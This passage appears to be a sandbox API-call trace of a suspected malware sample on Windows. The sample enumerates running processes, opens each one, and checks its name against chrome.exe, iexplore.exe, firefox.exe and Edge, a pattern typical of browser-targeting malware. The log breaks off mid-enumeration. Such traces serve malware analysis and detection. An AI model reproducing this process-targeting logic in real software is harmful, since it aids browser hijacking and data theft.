	[0198.641] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0198.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x16a8
	[0198.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.642] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0198.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.642] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.643] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0198.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.643] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.643] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x16ac
	[0198.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.644] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.644] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.645] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.645] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.645] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0198.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x16b0
	[0198.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.646] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0198.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.646] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.646] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0198.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.647] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.647] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0198.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x16b4
	[0198.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.648] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0198.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.648] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.648] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0198.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.649] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.649] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0198.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x16b8
	[0198.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.650] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0198.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.650] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.650] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0198.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.651] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.653] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0198.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x16bc
	[0198.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.654] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.654] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.654] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.655] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.655] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x16c0
	[0198.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.656] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.656] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.657] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.657] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.657] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x16c4
	[0198.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.658] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.658] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.659] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.659] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.659] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x16c8
	[0198.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.660] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.660] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.661] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.661] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.661] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x16cc
	[0198.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.662] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.662] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.662] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.663] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.663] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x16d0
	[0198.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.664] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.664] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.664] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.665] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.665] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x16d4
	[0198.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.666] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.666] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.666] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.667] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.667] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x16d8
	[0198.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.668] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.668] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.668] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.669] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0198.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x16dc
	[0198.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.670] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0198.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.670] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.670] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0198.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.671] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x16e0
	[0198.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.672] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.672] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.672] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.672] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.673] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0198.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x16e4
	[0198.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.673] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.674] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.674] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.674] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.675] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x16e8
	[0198.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.676] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.676] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.677] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.677] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.677] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x16ec
	[0198.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.678] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.678] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.679] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.679] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0198.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x16f0
	[0198.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.680] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0198.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.680] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.681] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0198.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.681] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.681] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0198.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x16f4
	[0198.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.683] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0198.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.683] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.683] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0198.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.684] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0198.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x16f8
	[0198.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.685] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.685] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.685] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.685] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0198.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x16fc
	[0198.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.686] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0198.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.687] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.687] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0198.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.687] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.687] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0198.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0198.688] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0198.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1700
	[0198.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.689] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0198.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.689] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.690] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0198.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.691] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.691] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0198.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1704
	[0198.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.692] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0198.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.692] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.692] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0198.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.693] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.693] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0198.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1708
	[0198.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.694] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0198.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
